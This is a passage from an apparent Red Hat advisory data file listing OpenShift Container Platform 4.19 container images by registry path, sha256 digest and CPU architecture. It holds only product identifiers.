"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
